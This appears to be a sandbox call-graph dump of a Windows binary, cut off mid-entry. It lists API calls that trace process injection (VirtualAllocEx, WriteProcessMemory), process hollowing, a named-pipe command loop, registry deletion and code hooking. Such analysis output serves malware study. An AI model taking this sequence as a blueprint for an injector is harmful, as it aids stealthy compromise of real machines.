17963 279a927a9a2 17962->17963 17963->17960 17964 279a927a9bb 17963->17964 17965 279a92799cc Is_bad_exception_allowed 9 API calls 17963->17965 17964->17960 17966 279a92799cc Is_bad_exception_allowed 9 API calls 17964->17966 17967 279a927a9e7 17964->17967 17965->17964 17966->17967 17968 279a92799e0 9 API calls 17967->17968 17969 279a927a9fb 17968->17969 17969->17960 17970 279a927aa14 17969->17970 17971 279a92799cc Is_bad_exception_allowed 9 API calls 17969->17971 17972 279a92799e0 9 API calls 17970->17972 17971->17970 17972->17960 17974 279a9279634 __GetUnwindTryBlock RtlLookupFunctionEntry 17973->17974 17975 279a927a195 17974->17975 17976 279a92799cc Is_bad_exception_allowed 9 API calls 17975->17976 17977 279a927a1cd 17976->17977 17978 279a9279838 9 API calls 17977->17978 17979 279a927a211 17978->17979 17979->17883 17981 279a92795b8 __FrameHandler3::ExecutionInCatch 17980->17981 17982 279a9279540 __FrameHandler3::ExecutionInCatch 9 API calls 17981->17982 17983 279a92795c2 17982->17983 17983->17889 17985 279a9278070 _invalid_parameter_noinfo 8 API calls 17984->17985 17986 279a9279932 17985->17986 17986->17912 17988 279a927a735 17987->17988 17992 279a927a948 17987->17992 17989 279a9279324 _CallSETranslator 9 API calls 17988->17989 17990 279a927a73a 17989->17990 17991 279a927a759 EncodePointer 17990->17991 17998 279a927a7ac 17990->17998 17993 279a9279324 _CallSETranslator 9 API calls 17991->17993 17992->17912 17994 279a927a769 17993->17994 17994->17998 18010 279a92794ec 17994->18010 17996 279a92799cc 9 API calls Is_bad_exception_allowed 17996->17998 17997 279a927a158 19 API calls 17997->17998 17998->17992 17998->17996 17998->17997 18000 279a9279197 17999->18000 18001 279a92791c0 RtlPcToFileHeader 18000->18001 18002 279a92791e2 RaiseException 18000->18002 18003 279a92791d8 18001->18003 18002->17921 18003->18002 18005 279a9279634 __GetUnwindTryBlock RtlLookupFunctionEntry 18004->18005 18006 279a9279dc7 18005->18006 18006->17940 18006->17941 18008 279a9279634 __GetUnwindTryBlock RtlLookupFunctionEntry 18007->18008 18009 279a9279e06 18008->18009 18009->17944 18011 279a9279324 _CallSETranslator 9 API calls 18010->18011 18012 279a9279518 18011->18012 18012->17998 16329 279a92734b8 16330 279a92734e8 16329->16330 16331 279a92735a1 16330->16331 16332 279a9273505 PdhGetCounterInfoW 16330->16332 16332->16331 16333 279a9273523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 16332->16333 16334 279a927358d GetProcessHeap HeapFree 16333->16334 16335 279a9273555 StrCmpW 16333->16335 16334->16331 16335->16334 16336 279a927356a 16335->16336 16336->16334 16338 279a9273950 StrCmpNW 16336->16338 16339 279a92739f2 16338->16339 16340 279a9273982 StrStrW 16338->16340 16339->16336 16340->16339 16341 279a927399b StrToIntW 16340->16341 16341->16339 16342 279a92739c3 16341->16342 16342->16339 16348 279a9271a30 OpenProcess 16342->16348 16345 279a9273f88 StrCmpNIW 16346 279a92739e4 16345->16346 16346->16339 16354 279a9271cfc 16346->16354 16349 279a9271ab6 16348->16349 16350 279a9271a64 K32GetModuleFileNameExW 16348->16350 16349->16339 16349->16345 16351 279a9271a7e PathFindFileNameW lstrlenW 16350->16351 16352 279a9271aad CloseHandle 16350->16352 16351->16352 16353 279a9271a9c StrCpyW 16351->16353 16352->16349 16353->16352 16355 279a9271d13 16354->16355 16357 279a9271d1c 16354->16357 16358 279a9271530 16355->16358 16357->16339 16359 279a9271580 16358->16359 16360 279a927154a 16358->16360 16359->16357 16360->16359 16361 279a9271569 StrCmpW 16360->16361 16362 279a9271561 StrCmpIW 16360->16362 16361->16360 16362->16360 18199 279a9272ab4 TlsGetValue TlsGetValue TlsGetValue 18200 279a9272b0d 18199->18200 18205 279a9272b79 18199->18205 18202 279a9272b15 18200->18202 18200->18205 18201 279a9272b74 18202->18201 18203 279a9272c32 TlsSetValue TlsSetValue TlsSetValue 18202->18203 18204 279a9273f88 StrCmpNIW 18202->18204 18203->18201 18204->18202 18205->18201 18205->18203 18206 279a9273f88 StrCmpNIW 18205->18206 18206->18205 18207 279a9272300 18208 279a9272331 18207->18208 18209 279a9272447 18208->18209 18215 279a9272412 18208->18215 18217 279a9272355 18208->18217 18210 279a927244c 18209->18210 18211 279a92724bb 18209->18211 18224 279a92735c8 GetProcessHeap HeapAlloc 18210->18224 18214 279a92735c8 11 API calls 18211->18214 18211->18215 18213 279a927238d StrCmpNIW 18213->18217 18214->18215 18217->18213 18217->18215 18218 279a9271d30 18217->18218 18219 279a9271d57 GetProcessHeap HeapAlloc 18218->18219 18220 279a9271db4 18218->18220 18219->18220 18221 279a9271d92 18219->18221 18220->18217 18222 279a9271cfc 2 API calls 18221->18222 18223 279a9271d9a GetProcessHeap HeapFree 18222->18223 18223->18220 18228 279a927361b 18224->18228 18225 279a92736d9 GetProcessHeap HeapFree 18225->18215 18226 279a92736d4 18226->18225 18227 279a9273666 StrCmpNIW 18227->18228 18228->18225 18228->18226 18228->18227 18229 279a9271d30 6 API calls 18228->18229 18229->18228 15521 140003668 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 15522 1400036be K32EnumProcesses 15521->15522 15523 1400036d3 15522->15523 15524 14000371b SleepEx 15522->15524 15523->15524 15526 1400031c4 15523->15526 15524->15522 15527 1400031d5 15526->15527 15528 1400031fd 15526->15528 15532 140001868 OpenProcess 15527->15532 15528->15523 15531 140001868 31 API calls 15531->15528 15533 140001cd1 15532->15533 15534 1400018b0 IsWow64Process 15532->15534 15533->15531 15535 1400018c7 CloseHandle 15534->15535 15535->15533 15537 1400018ed 15535->15537 15537->15533 15538 14000192f OpenProcess 15537->15538 15538->15533 15539 14000194b OpenProcess 15538->15539 15540 140001a04 NtQueryInformationProcess 15539->15540 15541 14000196a K32GetModuleFileNameExW 15539->15541 15544 140001cc8 CloseHandle 15540->15544 15545 140001a29 15540->15545 15542 1400019b3 CloseHandle 15541->15542 15543 140001983 PathFindFileNameW lstrlenW 15541->15543 15542->15540 15547 1400019c1 15542->15547 15543->15542 15546 1400019a0 StrCpyW 15543->15546 15544->15533 15545->15544 15548 140001a33 OpenProcessToken 15545->15548 15546->15542 15547->15540 15549 1400019e0 StrCmpIW 15547->15549 15548->15544 15550 140001a51 GetTokenInformation 15548->15550 15549->15544 15549->15547 15551 140001af4 15550->15551 15552 140001a79 GetLastError 15550->15552 15553 140001afb CloseHandle 15551->15553 15552->15551 15554 140001a84 LocalAlloc 15552->15554 15553->15544 15559 140001b0f 15553->15559 15554->15551 15555 140001a9a GetTokenInformation 15554->15555 15556 140001ae2 15555->15556 15557 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 15555->15557 15558 140001ae9 LocalFree 15556->15558 15557->15558 15558->15553 15559->15544 15560 140001b9f StrStrA 15559->15560 15561 140001bc8 15559->15561 15560->15559 15562 140001bcd 15560->15562 15561->15544 15562->15544 15563 140001bf8 VirtualAllocEx 15562->15563 15563->15544 15564 140001c27 WriteProcessMemory 15563->15564 15564->15544 15565 140001c46 15564->15565 15573 140002bfc 15565->15573 15567 140001c66 15567->15544 15568 140001c74 WaitForSingleObject 15567->15568 15569 140001c83 GetExitCodeThread 15568->15569 15570 140001cbd CloseHandle 15568->15570 15571 140001ca2 VirtualFreeEx 15569->15571 15572 140001c99 15569->15572 15570->15544 15571->15570 15572->15571 15576 1400020cc GetModuleHandleA 15573->15576 15577 1400020f5 15576->15577 15578 1400020ec GetProcAddress 15576->15578 15578->15577 17367 279a9275ff9 17368 279a9276000 VirtualProtect 17367->17368 17369 279a9276029 GetLastError 17368->17369 17370 279a9275f10 17368->17370 17369->17370 18819 279a92741f9 18822 279a9274146 18819->18822 18820 279a92741b0 18821 279a9274196 VirtualQuery 18821->18820 18821->18822 18822->18820 18822->18821 18823 279a92741ca VirtualAlloc 18822->18823 18823->18820 18824 279a92741fb GetLastError 18823->18824 18824->18820 18824->18822 17384 279a927cbfc 17389 279a927f3a0 17384->17389 17386 279a927cc05 17387 279a927cc22 __vcrt_uninitialize_ptd 17386->17387 17388 279a927cb10 __std_exception_copy 13 API calls 17386->17388 17388->17387 17390 279a927f3b1 17389->17390 17391 279a927f3b5 17389->17391 17390->17386 17391->17390 17392 279a927ef88 9 API calls 17391->17392 17392->17390 16369 279a927b500 16374 279a927c558 EnterCriticalSection 16369->16374 18831 279a9284611 __scrt_dllmain_exception_filter 18253 279a9278f0c 18260 279a927946c 18253->18260 18256 279a9278f19 18261 279a9279474 18260->18261 18263 279a92794a5 18261->18263 18265 279a9278f15 18261->18265 18277 279a9279d28 18261->18277 18264 279a92794b4 __vcrt_uninitialize_locks DeleteCriticalSection 18263->18264 18264->18265 18265->18256 18266 279a9279400 18265->18266 18282 279a9279bfc 18266->18282 18278 279a9279aac __vcrt_FlsAlloc 5 API calls 18277->18278 18279 279a9279d5e 18278->18279 18280 279a9279d68 18279->18280 18281 279a9279d73 InitializeCriticalSectionAndSpinCount 18279->18281 18280->18261 18281->18280 18283 279a9279aac __vcrt_FlsAlloc 5 API calls 18282->18283 18284 279a9279c21 TlsAlloc 18283->18284 18833 279a927820c 18840 279a9278f34 18833->18840 18837 279a9278219 18841 279a9279340 _CallSETranslator 9 API calls 18840->18841 18842 279a9278215 18841->18842 18842->18837 18843 279a927c288 18842->18843 18844 279a927cb10 __std_exception_copy 13 API calls 18843->18844 18845 279a9278222 18844->18845 18845->18837 18846 279a9278f48 18845->18846 18849 279a92792dc 18846->18849 18848 279a9278f51 18848->18837 18850 279a92792ed 18849->18850 18854 279a9279302 18849->18854 18851 279a9279c8c _CallSETranslator 6 API calls 18850->18851 18852 279a92792f2 18851->18852 18855 279a9279cd4 18852->18855 18854->18848 18856 279a9279aac __vcrt_FlsAlloc 5 API calls 18855->18856 18857 279a9279d02 18856->18857 18858 279a9279d0c 18857->18858 18859 279a9279d14 TlsSetValue 18857->18859 18858->18854 18859->18858 18869 279a927c218 18870 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18869->18870 18871 279a927c228 18870->18871 18872 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18871->18872 18873 279a927c23c 18872->18873 18874 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18873->18874 18875 279a927c250 18874->18875 18876 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18875->18876 18877 279a927c264 18876->18877 16379 279a9272518 GetProcessIdOfThread GetCurrentProcessId 16380 279a92725be 16379->16380 16381 279a9272543 CreateFileW 16379->16381 16381->16380 16382 279a9272577 WriteFile ReadFile CloseHandle 16381->16382 16382->16380 16391 279a927c510 16392 279a927c518 16391->16392 16393 279a927c545 16392->16393 16395 279a927c574 16392->16395 16396 279a927c59f 16395->16396 16397 279a927c582 DeleteCriticalSection 16396->16397 16398 279a927c5a3 16396->16398 16397->16396 16398->16393 17426 279a927f3e4 17427 279a927f41d 17426->17427 17429 279a927f3ee 17426->17429 17428 279a927f403 FreeLibrary 17428->17429 17429->17427 17429->17428 17430 279a92833e4 17431 279a92833f5 CloseHandle 17430->17431 17432 279a92833fb 17430->17432 17431->17432 18905 279a92725dc 18906 279a927265a 18905->18906 18907 279a92726bf GetFileType 18906->18907 18913 279a9272777 18906->18913 18908 279a92726cd StrCpyW 18907->18908 18909 279a92726e1 18907->18909 18911 279a92726ee 18908->18911 18910 279a9271ad4 4 API calls 18909->18910 18910->18911 18912 279a9273f88 StrCmpNIW 18911->18912 18911->18913 18914 279a9273708 4 API calls 18911->18914 18915 279a9271dd4 2 API calls 18911->18915 18912->18911 18914->18911 18915->18911 17462 279a92727e8 17463 279a9272867 17462->17463 17464 279a92728c9 GetFileType 17463->17464 17476 279a9272998 17463->17476 17465 279a92728ed 17464->17465 17466 279a92728d7 StrCpyW 17464->17466 17478 279a9271ad4 GetFinalPathNameByHandleW 17465->17478 17467 279a92728fc 17466->17467 17470 279a927299d 17467->17470 17471 279a9272906 17467->17471 17469 279a9273f88 StrCmpNIW 17469->17470 17470->17469 17473 279a9273708 4 API calls 17470->17473 17474 279a9271dd4 2 API calls 17470->17474 17470->17476 17472 279a9273f88 StrCmpNIW 17471->17472 17471->17476 17483 279a9273708 StrCmpIW 17471->17483 17487 279a9271dd4 17471->17487 17472->17471 17473->17470 17474->17470 17479 279a9271afe StrCmpNIW 17478->17479 17480 279a9271b3d 17478->17480 17479->17480 17481 279a9271b18 lstrlenW 17479->17481 17480->17467 17481->17480 17482 279a9271b2a StrCpyW 17481->17482 17482->17480 17484 279a927373a StrCpyW StrCatW 17483->17484 17485 279a9273751 PathCombineW 17483->17485 17486 279a927375a 17484->17486 17485->17486 17486->17471 17488 279a9271deb 17487->17488 17490 279a9271df4 17487->17490 17489 279a9271530 2 API calls 17488->17489 17489->17490 17490->17471 18329 279a927f6dc 18332 279a927f6e8 18329->18332 18330 279a927f70f 18332->18330 18333 279a9281c0c 18332->18333 18334 279a9281c11 18333->18334 18338 279a9281c4c 18333->18338 18335 279a9281c32 DeleteCriticalSection 18334->18335 18336 279a9281c44 18334->18336 18335->18335 18335->18336 18337 279a927d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18336->18337 18337->18338 18338->18332 17491 279a92763e3 17492 279a92763f0 17491->17492 17493 279a927655a 17492->17493 17494 279a92763fc GetThreadContext 17492->17494 17496 279a9276581 VirtualProtect FlushInstructionCache 17493->17496 17498 279a927663e 17493->17498 17494->17493 17495 279a9276422 17494->17495 17495->17493 17497 279a9276449 17495->17497 17496->17493 17501 279a92764cd 17497->17501 17503 279a92764a6 SetThreadContext 17497->17503 17499 279a927665e 17498->17499 17509 279a9274b20 17498->17509 17513 279a9275530 GetCurrentProcess 17499->17513 17503->17501 17504 279a92766b7 17507 279a9278070 _invalid_parameter_noinfo 8 API calls 17504->17507 17505 279a9276677 ResumeThread 17506 279a9276663 17505->17506 17506->17504 17506->17505 17508 279a92766ff 17507->17508 17511 279a9274b3c 17509->17511 17510 279a9274b9f 17510->17499 17511->17510 17512 279a9274b52 VirtualFree 17511->17512 17512->17511 17514 279a927554c 17513->17514 17515 279a9275593 17514->17515 17516 279a9275562 VirtualProtect FlushInstructionCache 17514->17516 17515->17506 17516->17514 18345 279a92806e0 18346 279a92806e9 18345->18346 18347 279a92806f9 18345->18347 18348 279a927d1f4 __std_exception_copy 13 API calls 18346->18348 18349 279a92806ee 18348->18349 18350 279a927d04c _invalid_parameter_noinfo 38 API calls 18349->18350 18350->18347 17517 279a9272ff0 17518 279a9273061 17517->17518 17519 279a9273384 17518->17519 17520 279a927308d GetModuleHandleA 17518->17520 17521 279a927309f GetProcAddress 17520->17521 17522 279a92730b1 17520->17522 17521->17522 17522->17519 17523 279a92730d8 StrCmpNIW 17522->17523 17523->17519 17529 279a92730fd 17523->17529 17524 279a9271a30 6 API calls 17524->17529 17525 279a927320f lstrlenW 17525->17529 17526 279a92732b9 lstrlenW 17526->17529 17527 279a9271cfc StrCmpIW StrCmpW 17527->17529 17528 279a9273f88 StrCmpNIW 17528->17529 17529->17519 17529->17524 17529->17525 17529->17526 17529->17527 17529->17528 16399 279a927acec 16402 279a92790c0 16399->16402 16401 279a927ad15 16403 279a92790e1 16402->16403 16404 279a9279116 16402->16404 16403->16404 16406 279a927c328 16403->16406 16404->16401 16407 279a927c33f 16406->16407 16408 279a927c335 16406->16408 16409 279a927d1f4 __std_exception_copy 13 API calls 16407->16409 16408->16407 16413 279a927c35a 16408->16413 16410 279a927c346 16409->16410 16411 279a927d04c _invalid_parameter_noinfo 38 API calls 16410->16411 16412 279a927c352 16411->16412 16412->16404 16413->16412 16414 279a927d1f4 __std_exception_copy 13 API calls 16413->16414 16414->16410 18351 279a92846f5 18352 279a9279324 _CallSETranslator 9 API calls 18351->18352 18353 279a928470d 18352->18353 18354 279a9279324 _CallSETranslator 9 API calls 18353->18354 18355 279a9284728 18354->18355 18356 279a9279324 _CallSETranslator 9 API calls 18355->18356 18357 279a928473c 18356->18357 18358 279a9279324 _CallSETranslator 9 API calls 18357->18358 18359 279a928477e 18358->18359 17530 279a927b7ea 17542 279a927c2f4 17530->17542 17543 279a927cab0 _invalid_parameter_noinfo 14 API calls 17542->17543 17544 279a927c2fd 17543->17544 18940 279a9271e3c LoadLibraryA GetProcAddress 18941 279a9271e6f 18940->18941 18942 279a9271e62 Sleep 18940->18942 18942->18942 17592 279a9284848 17595 279a927904c 17592->17595 17596 279a9279076 17595->17596 17597 279a9279064 17595->17597 17599 279a9279324 _CallSETranslator 9 API calls 17596->17599 17597->17596 17598 279a927906c 17597->17598 17600 279a9279074 17598->17600 17602 279a9279324 _CallSETranslator 9 API calls 17598->17602 17601 279a927907b 17599->17601 17601->17600 17603 279a9279324 _CallSETranslator 9 API calls 17601->17603 17604 279a927909b 17602->17604 17603->17600 17605 279a9279324 _CallSETranslator 9 API calls 17604->17605 17606 279a92790a8 17605->17606 17607 279a927c2f4 14 API calls 17606->17607 17608 279a92790b1 17607->17608 17609 279a927c2f4 14 API calls 17608->17609 17610 279a92790bd 17609->17610 16472 279a927ad48 16473 279a9279324 _CallSETranslator 9 API calls 16472->16473 16474 279a927ad7d 16473->16474 16475 279a9279324 _CallSETranslator 9 API calls 16474->16475 16476 279a927ad8b __except_validate_context_record 16475->16476 16477 279a9279324 _CallSETranslator 9 API calls 16476->16477 16478 279a927adcf 16477->16478 16479 279a9279324 _CallSETranslator 9 API calls 16478->16479 16480 279a927add8 16479->16480 16481 279a9279324 _CallSETranslator 9 API calls 16480->16481 16482 279a927ade1 16481->16482 16495 279a927993c 16482->16495 16485 279a9279324 _CallSETranslator 9 API calls 16486 279a927ae11 __CxxCallCatchBlock 16485->16486 16502 279a9279978 16486->16502 16488 279a927aeeb __CxxCallCatchBlock 16489 279a9279324 _CallSETranslator 9 API calls 16488->16489 16490 279a927aefe 16489->16490 16491 279a9279324 _CallSETranslator 9 API calls 16490->16491 16493 279a927af07 16491->16493 16496 279a9279324 _CallSETranslator 9 API calls 16495->16496 16497 279a927994d 16496->16497 16498 279a9279958 16497->16498 16499 279a9279324 _CallSETranslator 9 API calls 16497->16499 16500 279a9279324 _CallSETranslator 9 API calls 16498->16500 16499->16498 16501 279a9279969 16500->16501 16501->16485 16501->16486 16503 279a9279324 _CallSETranslator 9 API calls 16502->16503 16504 279a927998a 16503->16504 16505 279a92799c5 16504->16505 16506 279a9279324 _CallSETranslator 9 API calls 16504->16506 16507 279a9279995 16506->16507 16507->16505 16508 279a9279324 _CallSETranslator 9 API calls 16507->16508 16509 279a92799b6 16508->16509 16509->16488 16510 279a9278ff8 16509->16510 16511 279a9279324 _CallSETranslator 9 API calls 16510->16511 16512 279a9279006 16511->16512 16512->16488 18946 279a927ae42 18947 279a9279324 _CallSETranslator 9 API calls 18946->18947 18949 279a927ae4f __CxxCallCatchBlock 18947->18949 18948 279a927ae93 RaiseException 18950 279a927aeba 18948->18950 18949->18948 18951 279a9279978 __CxxCallCatchBlock 9 API calls 18950->18951 18956 279a927aec2 18951->18956 18952 279a927aeeb __CxxCallCatchBlock 18953 279a9279324 _CallSETranslator 9 API calls 18952->18953 18954 279a927aefe 18953->18954 18955 279a9279324 _CallSETranslator 9 API calls 18954->18955 18957 279a927af07 18955->18957 18956->18952 18958 279a9278ff8 __CxxCallCatchBlock 9 API calls 18956->18958 18958->18952 15609 140002cb0 15610 140002cbd 15609->15610 15611 140002300 6 API calls 15610->15611 15612 140002cd2 Sleep 15610->15612 15613 140002cdd ConnectNamedPipe 15610->15613 15611->15610 15612->15610 15614 140002d21 Sleep 15613->15614 15615 140002cec ReadFile 15613->15615 15616 140002d2c DisconnectNamedPipe 15614->15616 15615->15616 15617 140002d0f 15615->15617 15616->15613 15617->15616 15619 140003204 15617->15619 15620 14000322b 15619->15620 15621 14000341d 15619->15621 15622 140003231 15620->15622 15623 14000338b GetProcessHeap HeapAlloc K32EnumProcesses 15620->15623 15624 140003599 ReadFile 15621->15624 15625 140003429 15621->15625 15626 140003382 ExitProcess 15622->15626 15627 14000323d 15622->15627 15628 1400032ce 15623->15628 15646 1400033c9 15623->15646 15624->15628 15629 1400035c3 15624->15629 15630 140003432 15625->15630 15631 14000358f 15625->15631 15633 140003246 15627->15633 15634 1400032ea RegOpenKeyExW 15627->15634 15628->15617 15629->15628 15635 1400035d0 GetProcessHeap HeapAlloc 15629->15635 15636 140003534 15630->15636 15637 14000343e 15630->15637 15632 140001f7c 22 API calls 15631->15632 15638 1400032c9 15632->15638 15633->15628 15653 140003260 ReadFile 15633->15653 15643 140003353 15634->15643 15644 140003317 RegDeleteValueW RegDeleteValueW RegDeleteValueW 15634->15644 15639 140001cf0 13 API calls 15635->15639 15642 1400020fc ReadFile 15636->15642 15640 140003443 15637->15640 15641 140003480 15637->15641 15638->15628 15663 140003609 15639->15663 15640->15628 15648 14000344f 15640->15648 15697 1400020fc 15641->15697 15649 140003543 15642->15649 15681 14000217c SysAllocString SysAllocString CoInitializeEx 15643->15681 15644->15643 15645 140001868 31 API calls 15645->15646 15646->15628 15646->15645 15694 140002c5c 15648->15694 15649->15628 15660 1400020fc ReadFile 15649->15660 15652 14000335f 15657 14000217c 9 API calls 15652->15657 15653->15628 15658 14000328a 15653->15658 15654 14000363e GetProcessHeap HeapFree 15654->15628 15656 140003497 ReadFile 15656->15628 15661 1400034bf 15656->15661 15662 14000336b 15657->15662 15658->15628 15668 140001868 31 API calls 15658->15668 15665 14000355a 15660->15665 15661->15628 15666 1400034cc GetProcessHeap HeapAlloc ReadFile 15661->15666 15689 140001f7c GetProcessHeap HeapAlloc 15662->15689 15663->15654 15669 14000352f 15663->15669 15729 140001eec 15663->15729 15665->15628 15671 140003562 ShellExecuteW 15665->15671 15666->15654 15672 140003510 15666->15672 15674 1400032b0 15668->15674 15669->15654 15671->15628 15672->15654 15701 140002434 15672->15701 15677 140001868 31 API calls 15674->15677 15677->15638 15682 1400022d8 SysFreeString SysFreeString 15681->15682 15683 1400021bd CoInitializeSecurity 15681->15683 15682->15652 15684 140002205 CoCreateInstance 15683->15684 15685 1400021f9 15683->15685 15686 1400022d2 CoUninitialize 15684->15686 15687 140002234 VariantInit 15684->15687 15685->15684 15685->15686 15686->15682 15688 14000228a 15687->15688 15688->15686 15690 140001cf0 13 API calls 15689->15690 15692 140001fba 15690->15692 15691 140001fe8 GetProcessHeap HeapFree 15692->15691 15693 140001eec 5 API calls 15692->15693 15693->15692 15695 1400020cc 2 API calls 15694->15695 15696 140002c71 15695->15696 15698 140002120 ReadFile 15697->15698 15699 140002143 15698->15699 15700 14000215d 15698->15700 15699->15698 15699->15700 15700->15628 15700->15656 15702 14000246f 15701->15702 15726 140002726 15701->15726 15703 1400020cc 2 API calls 15702->15703 15725 1400024ae 15702->15725 15702->15726 15703->15725 15704 1400024d7 CreateProcessW 15704->15725 15705 1400028e1 OpenProcess 15706 1400028f1 TerminateProcess 15705->15706 15705->15725 15706->15725 15707 1400020cc GetModuleHandleA GetProcAddress 15707->15725 15708 140002566 VirtualAllocEx 15710 140002595 WriteProcessMemory 15708->15710 15708->15725 15709 14000273f VirtualAllocEx 15711 14000276d WriteProcessMemory 15709->15711 15709->15725 15712 1400025b7 VirtualProtectEx 15710->15712 15710->15725 15713 14000278f VirtualProtectEx 15711->15713 15711->15725 15712->15725 15713->15725 15714 140002858 VirtualAlloc 15718 140002879 Wow64GetThreadContext 15714->15718 15714->15725 15715 140002682 VirtualAlloc 15717 1400026a7 GetThreadContext 15715->15717 15715->15725 15716 1400027d0 WriteProcessMemory 15716->15725 15720 1400026c4 WriteProcessMemory 15717->15720 15717->15725 15721 140002891 WriteProcessMemory 15718->15721 15718->15725 15719 1400025f9 WriteProcessMemory 15719->15725 15722 1400026ef SetThreadContext 15720->15722 15720->15725 15723 1400028b6 Wow64SetThreadContext 15721->15723 15721->15725 15724 140002712 ResumeThread 15722->15724 15722->15725 15723->15725 15724->15725 15724->15726 15725->15704 15725->15705 15725->15707 15725->15708 15725->15709 15725->15714 15725->15715 15725->15716 15725->15719 15725->15726 15727 140002643 VirtualProtectEx 15725->15727 15728 14000281a VirtualProtectEx 15725->15728 15726->15669 15727->15725 15728->15725 15730 140001f65 15729->15730 15731 140001f0b OpenProcess 15729->15731 15730->15654 15731->15730 15732 140001f23 15731->15732 15733 140002bfc 2 API calls 15732->15733 15734 140001f43 15733->15734 15735 140001f5c CloseHandle 15734->15735 15736 140001f51 CloseHandle 15734->15736 15735->15730 15736->15735 17612 279a927f440 GetProcessHeap 18392 279a927ff40 18393 279a927ff4b 18392->18393 18401 279a9282c24 18393->18401 18414 279a927c558 EnterCriticalSection 18401->18414 18968 279a92ad658 18969 279a92ad67d 18968->18969 18975 279a92ad694 18968->18975 18970 279a92ad1f4 __std_exception_copy 13 API calls 18969->18970 18971 279a92ad682 18970->18971 18973 279a92ad04c _invalid_parameter_noinfo 38 API calls 18971->18973 18972 279a92ad724 18976 279a92abb54 13 API calls 18972->18976 18974 279a92ad68d 18973->18974 18975->18972 18983 279a92ad7b6 18975->18983 18985 279a92ad6da 18975->18985 19001 279a92ad894 18975->19001 19063 279a92ada18 18975->19063 18977 279a92ad77c 18976->18977 18980 279a92ad784 18977->18980 18989 279a92ad7d7 18977->18989 18982 279a92ad2a0 __free_lconv_num 13 API calls 18980->18982 18981 279a92ad836 18984 279a92ad2a0 __free_lconv_num 13 API calls 18981->18984 18986 279a92ad78b 18982->18986 18988 279a92ad6fd 18983->18988 18993 279a92ad2a0 __free_lconv_num 13 API calls 18983->18993 18987 279a92ad841 18984->18987 18985->18988 18994 279a92ad2a0 __free_lconv_num 13 API calls 18985->18994 18986->18988 18990 279a92ad2a0 __free_lconv_num 13 API calls 18986->18990 18992 279a92ad85a 18987->18992 18996 279a92ad2a0 __free_lconv_num 13 API calls 18987->18996 18991 279a92ad2a0 __free_lconv_num 13 API calls 18988->18991 18989->18981 18989->18989 18998 279a92ad87c 18989->18998 19100 279a92b0eb8 18989->19100 18990->18986 18991->18974 18997 279a92ad2a0 __free_lconv_num 13 API calls 18992->18997 18993->18983 18994->18985 18996->18987 18997->18974 18999 279a92ad06c _invalid_parameter_noinfo 17 API calls 18998->18999 19000 279a92ad891 18999->19000 19002 279a92ad8c2 19001->19002 19002->19002 19003 279a92ad8de 19002->19003 19004 279a92ad220 __std_exception_copy 13 API calls 19002->19004 19003->18975 19005 279a92ad90d 19004->19005 19006 279a92ad926 19005->19006 19007 279a92b0eb8 38 API calls 19005->19007 19008 279a92b0eb8 38 API calls 19006->19008 19010 279a92ad9fc 19006->19010 19007->19006 19009 279a92ad943 19008->19009 19009->19010 19012 279a92ad97f 19009->19012 19013 279a92ad962 19009->19013 19014 279a92ad98d 19009->19014 19011 279a92ad06c _invalid_parameter_noinfo 17 API calls 19010->19011 19023 279a92ada17 19011->19023 19017 279a92ad2a0 __free_lconv_num 13 API calls 19012->19017 19016 279a92ad220 __std_exception_copy 13 API calls 19013->19016 19015 279a92ad977 19014->19015 19109 279a92aeee0 19014->19109 19015->19012 19020 279a92ad2a0 __free_lconv_num 13 API calls 19015->19020 19021 279a92ad96d 19016->19021 19017->19010 19019 279a92ada7a 19028 279a92ada8c 19019->19028 19032 279a92adaa1 19019->19032 19020->19012 19024 279a92ad2a0 __free_lconv_num 13 API calls 19021->19024 19022 279a92ad9b5 19025 279a92ad9ba 19022->19025 19026 279a92ad9d0 19022->19026 19023->19019 19118 279a92b13d8 19023->19118 19024->19015 19029 279a92ad2a0 __free_lconv_num 13 API calls 19025->19029 19030 279a92ad2a0 __free_lconv_num 13 API calls 19026->19030 19031 279a92ad894 52 API calls 19028->19031 19029->19015 19030->19012 19045 279a92ada9c 19031->19045 19034 279a92add78 14 API calls 19032->19034 19033 279a92a8070 _invalid_parameter_noinfo 8 API calls 19035 279a92add64 19033->19035 19036 279a92adb0b 19034->19036 19035->18975 19037 279a92adb1a 19036->19037 19038 279a92af198 9 API calls 19036->19038 19127 279a92ad30c 19037->19127 19038->19037 19041 279a92adba8 19042 279a92ad894 52 API calls 19041->19042 19044 279a92adbb8 19042->19044 19043 279a92add78 14 API calls 19051 279a92adbd2 19043->19051 19044->19045 19046 279a92ad2a0 __free_lconv_num 13 API calls 19044->19046 19045->19033 19046->19045 19047 279a92af198 9 API calls 19047->19051 19049 279a92ad894 52 API calls 19049->19051 19050 279a92adcc8 FindNextFileW 19050->19051 19052 279a92adce0 19050->19052 19051->19043 19051->19047 19051->19049 19051->19050 19053 279a92ad2a0 13 API calls __free_lconv_num 19051->19053 19054 279a92add2a 19051->19054 19149 279a92ad4ac 19051->19149 19055 279a92add0c FindClose 19052->19055 19171 279a92b0b20 19052->19171 19053->19051 19056 279a92add38 FindClose 19054->19056 19059 279a92ad2a0 __free_lconv_num 13 API calls 19054->19059 19055->19045 19058 279a92add1c 19055->19058 19056->19045 19060 279a92add48 19056->19060 19061 279a92ad2a0 __free_lconv_num 13 API calls 19058->19061 19059->19056 19062 279a92ad2a0 __free_lconv_num 13 API calls 19060->19062 19061->19045 19062->19045 19064 279a92ada58 19063->19064 19065 279a92ada7a 19063->19065 19064->19065 19066 279a92b13d8 38 API calls 19064->19066 19067 279a92ada8c 19065->19067 19069 279a92adaa1 19065->19069 19066->19064 19068 279a92ad894 56 API calls 19067->19068 19082 279a92ada9c 19068->19082 19071 279a92add78 14 API calls 19069->19071 19070 279a92a8070 _invalid_parameter_noinfo 8 API calls 19072 279a92add64 19070->19072 19073 279a92adb0b 19071->19073 19072->18975 19074 279a92adb1a 19073->19074 19075 279a92af198 9 API calls 19073->19075 19076 279a92ad30c 16 API calls 19074->19076 19075->19074 19077 279a92adb7b FindFirstFileExW 19076->19077 19078 279a92adba8 19077->19078 19088 279a92adbd2 19077->19088 19079 279a92ad894 56 API calls 19078->19079 19081 